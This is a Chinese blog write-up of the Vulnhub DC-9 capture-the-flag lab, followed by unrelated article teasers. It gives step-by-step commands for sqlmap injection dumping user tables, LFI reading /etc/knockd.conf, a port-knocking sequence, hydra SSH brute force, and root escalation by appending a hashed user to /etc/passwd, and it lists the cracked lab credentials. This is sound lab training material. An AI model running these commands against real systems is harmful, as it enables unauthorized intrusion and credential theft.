Vulnhub靶场DC-9

news2024/12/24 11:41:38

攻击机192.168.223.128
靶机192.168.223.138
主机发现 nmap -sP 192.168.223.0/24
在这里插入图片描述

端口扫描 nmap -sV -p- -A 192.168.223.138
在这里插入图片描述

开启了22 80端口
访问一下web页面
在这里插入图片描述

有个查询界面
在这里插入图片描述

测试发现存在post型的sql注入
在这里插入图片描述

用sqlmap跑一下,因为是post型的,这里加一个post的data
sqlmap -u http://192.168.223.138/results.php --data "search=1" --dbs 爆库
在这里插入图片描述

三个库,看一下users的

 sqlmap -u http://192.168.223.138/results.php --data "search=1" --tables -D users --batch

只有一个表
在这里插入图片描述

看一下字段

sqlmap -u http://192.168.223.138/results.php --data "search=1" --columns -D users  -T UserDetails --batch

在这里插入图片描述

有账号密码
看一下账号密码

sqlmap -u http://192.168.223.138/results.php --data "search=1" -C username,password -D users  -T UserDetails --dump

在这里插入图片描述

账号密码都爆出来了,登录一下
在这里插入图片描述

等一下这个管理员的账号,md登不上去0.0
测试了其他账号密码也登不上去,我淦
还有一个库没看Staff
sqlmap -u http://192.168.223.138/results.php --data "search=1" --tables -D Staff --batch爆表

在这里插入图片描述

也有个Users

sqlmap -u http://192.168.223.138/results.php --data "search=1" --columns -D Staff -T Users --batch爆字段
在这里插入图片描述

有账号密码

sqlmap -u http://192.168.223.138/results.php --data "search=1" -C Username,Password -D Staff -T Users --dump --batch

在这里插入图片描述

admin 856f5de590ef37314e7c3bdf6f8a66dc
密码用md5解密看看
在这里插入图片描述

密码是transorbital1
在这里插入图片描述

成功登录
注意下面显示
在这里插入图片描述

可能有文件包含
用bp抓包看看
在这里插入图片描述

并没有什么参数,根据前面有个靶机的经验,文件包含的参数名可能是file
测试一下
在这里插入图片描述

成功LFI
BUT,后面不会了,尝试了ssh连接也无果。
看了别人wp后才知道靶机开启了knockd服务
搜索了一下相关知识
在这里插入图片描述

在第一步信息收集的时候22端口其实状态是被过滤的,我忽略了这一点
在这里插入图片描述

重新看一下,也验证了靶机开启了knockd服务
看一下配置文件,默认配置文件在/etc/knockd.conf
在这里插入图片描述

其中7469,8475,9842 就是我们敲门的端口序列
用nmap依次访问22端口就会开启

nmap -p 7469 192.168.223.138
nmap -p 8475 192.168.223.138
nmap -p 9842 192.168.223.138

在这里插入图片描述

在扫一下端口看看22端口开没开
在这里插入图片描述

这里看到22端口已经开启了
那么应该就可以用ssh连接了
为了方便,把之前获得的账号和密码分别放入两个txt文档用hydra爆破一下,省手输入了

hydra -L users.txt -P password.txt ssh://192.168.223.138

爆出来三组账号密码

在这里插入图片描述

login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee

ssh chandlerb@192.168.223.138
ssh joeyt@192.168.223.138
ssh janitor@192.168.223.138

先登第一个看看,空的
看第二个,也是空的
看第三个,也是空的,
我擦
难道是隐藏了

ls -a 看一下

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

看到janitor账户多一个文件
在这里插入图片描述

打开发现里面有个密码文件
可能是其他账户密码,加到字典里再爆破一次
在这里插入图片描述

多爆破出来一组fredf!login: fredf password: B4-Tru3-001
我最初怀疑的管理员!管理员总应该有点root权限吧?
sudo -l 看一下
在这里插入图片描述

果然有一个免密rooot
打开这个文件看一下
在这里插入图片描述

好多编译文件,不知道如何利用,看看上一级test.py是什么东西
在这里插入图片描述

是一个文件读写的脚本,读取第一个参数文件的内容,写入到第二个参数文件里
可以利用这个脚本写一个有root权限的用户到/etc/passwd就可以提权了
先来到tmp目录写一个免密的root

echo ttao::0:0:root:/bin/bash >>/tmp/mr

然后执行test
sudo ./test /tmp/mr /etc/passwd发现不太行,可能是文件权限稳定,暂时没搞懂
那就弄个加密的root
用openssl加盐

openssl passwd -1 -salt xt xt

1 1 1xt$Mpdxuy7oTO65ufaQVL4zS1
在这里插入图片描述

echo 'echo 'xt:$1$xt$Mpdxuy7oTO65ufaQVL4zS1:0:0:root:/bin/bash' >> /tmp/xt
' >> /tmp/xt
sudo ./test /tmp/xt /etc/passwd

su xt
在这里插入图片描述

成功拿下flag。
1.sql注入2.LFI本地包含3.knockd敲门服务4.ssh连接5.hyrdra爆破6.ls -a读取隐藏文件7.openssl生成加盐密码8.写入root权限用户

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1413248.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C#使用RabbitMQ-1_Docker部署并在c#中实现简单模式消息代理

介绍 RabbitMQ是一个开源的消息队列系统,实现了高级消息队列协议(AMQP)。 🍀RabbitMQ起源于金融系统,现在广泛应用于各种分布式系统中。它的主要功能是在应用程序之间提供异步消息传递,实现系统间的解耦和…

RabbitMQ问题总结

:::info 使用场景 异步发送(验证码、短信、邮件。。。)MySQL 和 Redis、ES 之间的数据同步分布式事务削峰填谷… ::: 如何保证消息不丢失 上图是消息正常发送的一个过程,那在哪个环节中消息容易丢失?在哪一个环节都可能丢失 生…

Ubuntu20.4 Mono C# gtk 编程习练笔记(四)

连续实时绘图 图看上去不是很清晰,KAZAM录屏AVI尺寸80MB, 转换成gif后10MB, 按CSDN对GIF要求,把它剪裁缩小压缩成了上面的GIF,图像质量大不如原屏AVI,但应该能说明原意:随机数据随时间绘制在 gtk 的 drawin…

使用OpenCV实现一个简单的实时人脸跟踪

简介: 这个项目将通过使用OpenCV库来进行实时人脸跟踪。实时人脸跟踪是一项在实际应用中非常有用的技术,如视频通话、智能监控等。我们将使用OpenCV中的VideoCapture()函数来读取视频流,并使用之前加载的Haar特征级联分类器来进行人脸跟踪。 …

浅谈Python两大爬虫库——urllib库和requests库区别

目录 一、urllib库 1、使用方法 2、功能 3、效率 二、requests库 1、使用方法 2、功能 3、效率 三、总结与建议 在Python中,网络爬虫是一个重要的应用领域。为了实现网络爬虫,Python提供了许多库来发送HTTP请求和处理响应。其中,url…

MySql8的简单使用(1.模糊查询 2.group by 分组 having过滤 3.JSON字段的实践)

MySql8的简单使用(1.模糊查询 2.group by 分组 having过滤 3.JSON字段的实践) 一.like模糊查询、group by 分组 having 过滤 建表语句 create table student(id int PRIMARY KEY,name char(10),age int,sex char(5)); alter table student add height…

【Linux C | 网络编程】入门知识:TCP协议、TCP客户端、TCP服务端

😁博客主页😁:🚀https://blog.csdn.net/wkd_007🚀 🤑博客内容🤑:🍭嵌入式开发、Linux、C语言、C、数据结构、音视频🍭 🤣本文内容🤣&a…

MySQL 数据库 JDBC 简化 JDBCTemplate

JDBCTemplate编程 场景:使用JdbcTemplate技术向MySQL中插入一条数据 表结构如下 create table t_person(person_id int primary key auto_increment,person_name varchar(20),age tinyint,sex enum(男,女,奥特曼),height decimal(4,1),birthday datetime ) AP…

勤学苦练“prompts“,如沐春风“CodeArts Snap“

前言 CodeArts Snap 上手一段时间了,对编程很有帮助。但是,感觉代码编写的不尽人意。 我因此也感到困惑,想要一份完整的 CodeArts Snap 手册看看。 就在我感觉仿佛"独自彷徨在这条悠长、悠长又寂寥的雨巷"时,我听了大…

Ubuntu+Apache+MySQL+PHP+phpstorm+xdebug下的debug环境搭建(纯小白笔记)

关键词 一、win10双系统装Ubuntu(Deepin) 参考文章: https://www.cnblogs.com/masbay/p/11627727.html 1.1 首先需要确定自己操作系统的引导方式 1.1.1 查看BIOS模式 “winr"快捷键进入"运行”,输入"msinfo32…

微软 AD |域控制器 | 组件 | 域服务 | 对象解析

介绍 Active Directory(AD),是微软的目录服务,提供强大的功能和管理体系,用于组织管理和安全存储网络上的资源和用户、计算机、服务对象等信息。 AD 功能: 身份验证和访问控制: 提供集中式的身…

2024 高级前端面试题之 CSS 「精选篇」

该内容主要整理关于 CSS 的相关面试题,其他内容面试题请移步至 「最新最全的前端面试题集锦」 查看。 CSS模块精选篇 1. 盒模型2. BFC3. 层叠上下文4. 居中布局5. 选择器权重计算方式6. 清除浮动7. link 与 import 的区别8. CSS3的新特性9. CSS动画和过渡10. 有哪些…

Mac中java jdk、android sdk、flutter sdk目录

1、Java JDK 目录 (1)官网下载的 Java JDK Java JDK下载官网 /Library/Java/JavaVirtualMachines(2)Android Studio下载的 Java JDK /Users/用户名/Library/Java/JavaVirtualMachines2、Android SDK 目录 /Users/用户名/Libr…

以梦为码,CodeArts Snap 缩短我与算法的距离

背景 最近一直在体验华为云的 CodeArts Snap,逐渐掌握了使用方法,代码自动生成的准确程度大大提高了。 自从上次跟着 CodeArts Snap 学习用 Python 编程,逐渐喜欢上了 Python。 我还给 CodeArts Snap 起了一个花名: 最佳智能学…

SQL注入实战:二阶注入

一、二阶注入的原理 1、二阶注入也称为SOL二次注入。 2、二次注入漏洞是一种在Web应用程序中广泛存在的安全漏洞形式:相对于一次注入漏洞而言,二次注入漏洞更难以被发现,但是它却具有与一次注入攻击漏洞相同的攻击威力。 3、简单的说,二次…

GitHub国内打不开(解决办法有效)

最近国内访问github.com经常打不开,无法访问。 github网站打不开的解决方法 1.打开网站http://tool.chinaz.com/dns/ ,在A类型的查询中输入 github.com,找出最快的IP地址。 2.修改hosts文件。 在hosts文件中添加: # localhost n…

Leetcode—2807. 在链表中插入最大公约数【中等】

2023每日刷题(九十九) Leetcode—2807. 在链表中插入最大公约数 实现代码 /*** Definition for singly-linked list.* struct ListNode {* int val;* ListNode *next;* ListNode() : val(0), next(nullptr) {}* ListNode(int x) : val…

Datawhale 组队学习之大模型理论基础 Task7 分布式训练

第8章 分布式训练 8.1 为什么分布式训练越来越流行 近年来,模型规模越来越大,对硬件(算力、内存)的发展提出要求。因为内存墙的存在,单一设持续提高芯片的集成越来越困难,难以跟上模型扩大的需求。 为了…

力扣每日一题 ---- 1039. 多边形三角剖分的最低得分

这题的难点在哪部分呢,其实是怎么思考。这道题如果之前没做过类似的话,还是很难看出一些性质的,这题原本的话是没有图片把用例显示的这么详细的。这题中有个很隐晦的点没有说出来 剖出来的三角形是否有交叉,这题中如果加一个三角…

企业级大数据安全架构(六)数据授权和审计管理

作者:楼高 本节详细介绍企业级大数据架构中的第六部分,数据授权和审计管理 1.Ranger简介 Apache Ranger是一款被设计成全面掌管Hadoop生态系统的数据安全管理框架,为Hadoop生态系统众多组件提供一个统一的数据授权和管理界面, 管…